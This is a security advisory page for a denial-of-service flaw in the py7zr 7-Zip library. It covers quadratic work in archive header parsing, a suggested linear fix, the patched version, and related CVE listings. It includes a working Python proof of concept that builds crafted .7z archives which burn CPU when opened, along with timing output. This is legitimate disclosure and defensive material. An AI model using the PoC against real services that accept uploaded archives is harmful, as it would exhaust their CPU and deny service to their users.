Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Unauthenticated network input parsed with low complexity and no interaction (AV:N/AC:L/PR:N/UI:N); only availability is affected via CPU exhaustion, so C:N/I:N/A:H with scope unchanged.
Primary rating from Vendor (https://github.com/miurahr/py7zr).
CVSS VectorVendor: https://github.com/miurahr/py7zr
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6Blast Radius
ecosystem impact- 363 pypi packages depend on py7zr (224 direct, 142 indirect)
Ecosystem-wide dependent count for version 1.1.3.
DescriptionCVE.org
Summary
PackInfo._read() uses an O(n^2) cumulative sum pattern where numstreams is read directly from the archive header. A crafted .7z archive with a large numstreams value causes excessive CPU consumption during SevenZipFile.__init__() - no extraction is needed. A 50 KB archive takes ~7 seconds of CPU time.
Details
The vulnerable code is in PackInfo._read() (archiveinfo.py):
self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]
numstreams is parsed from the archive header via read_uint64() and is attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the beginning, producing O(n^2) total work. This runs during header parsing in SevenZipFile.__init__(), before any extraction.
Suggested fix - replace with O(n) cumulative sum:
from itertools import accumulate self.packpositions = [0] + list(accumulate(self.packsizes))
PoC
import py7zr
from py7zr.archiveinfo import write_uint64, PROPERTY
MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'
def encode_uint64(v):
buf = io.BytesIO()
write_uint64(buf, v)
return buf.getvalue()
def build_7z_with_streams(numstreams):
header = io.BytesIO()
header.write(PROPERTY.HEADER)
header.write(PROPERTY.MAIN_STREAMS_INFO)
header.write(PROPERTY.PACK_INFO)
header.write(encode_uint64(0))
header.write(encode_uint64(numstreams))
header.write(PROPERTY.SIZE)
for _ in range(numstreams):
header.write(encode_uint64(1))
header.write(PROPERTY.END)
header.write(PROPERTY.END)
header.write(PROPERTY.END)
header_data = header.getvalue()
out = io.BytesIO()
out.write(MAGIC)
out.write(b'\x00\x04')
next_crc = binascii.crc32(header_data) & 0xFFFFFFFF
start_header = (struct.pack('<Q', 0)
+ struct.pack('<Q', len(header_data))
+ struct.pack('<I', next_crc))
out.write(struct.pack('<I', binascii.crc32(start_header) &
0xFFFFFFFF))
out.write(start_header)
out.write(header_data)
return out.getvalue()
for n in [1000, 5000, 10000, 30000, 50000]:
archive = build_7z_with_streams(n)
start = time.time()
try:
with py7zr.SevenZipFile(io.BytesIO(archive), 'r') as z:
pass
except Exception:
# The crafted archive may later raise due to being malformed,
# but the quadratic work has already been performed during
# header parsing in SevenZipFile.__init__().
pass
elapsed = time.time() - start
print(f"n={n:6d} size={len(archive):8d} bytes
time={elapsed:.3f}s")Tested on py7zr 1.1.0, Python 3.12.3, Linux x86_64.
Results:
n= 1000 size= 1042 bytes time=0.004s n= 5000 size= 5042 bytes time=0.071s n= 10000 size= 10042 bytes time=0.291s n= 30000 size= 30043 bytes time=2.609s n= 50000 size= 50043 bytes time=7.097s
Impact
Denial of Service. Any application that opens .7z archives from untrusted sources using py7zr.SevenZipFile() can be caused to consume excessive CPU time with a small crafted archive. The quadratic cost occurs during header parsing, before any content extraction.
AnalysisAI
Denial of service in py7zr (a pure-Python 7-Zip library) versions 1.1.2 and earlier lets a remote, unauthenticated attacker exhaust CPU with a tiny crafted .7z archive. The flaw is in header parsing (PackInfo._read), so merely opening the archive with SevenZipFile() - no extraction - triggers the cost; a ~50 KB file consumes roughly 7 seconds of CPU. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The target application must open an attacker-supplied .7z archive from an untrusted source using py7zr.SevenZipFile() on version 1.1.2 or earlier. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H) scores 8.7 and accurately reflects a pure-availability impact: no confidentiality or integrity loss, but a low-complexity, unauthenticated, no-interaction trigger against any application that opens untrusted archives. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker uploads a ~50 KB .7z file with a maliciously large numstreams value to a service that opens archives with py7zr (for example a file scanner or upload processor). When the application calls SevenZipFile() to inspect the file, header parsing performs quadratic work and burns seconds of CPU before any extraction, and repeated requests exhaust server CPU. … |
| Remediation | Vendor-released patch: upgrade to py7zr 1.1.3 or later (fix confirmed at https://github.com/miurahr/py7zr/releases/tag/v1.1.3 and advisory GHSA-h4gh-22qq-72r7); the patch both caps the parsed numstreams parameter and replaces the O(n^2) computation with an O(n) accumulate. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all systems and applications using py7zr to determine attack surface scope. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-407 – Inefficient Algorithmic Complexity
View allSame technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: Moderate| Product | Status |
|---|---|
| openSUSE Tumbleweed | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42397
GHSA-h4gh-22qq-72r7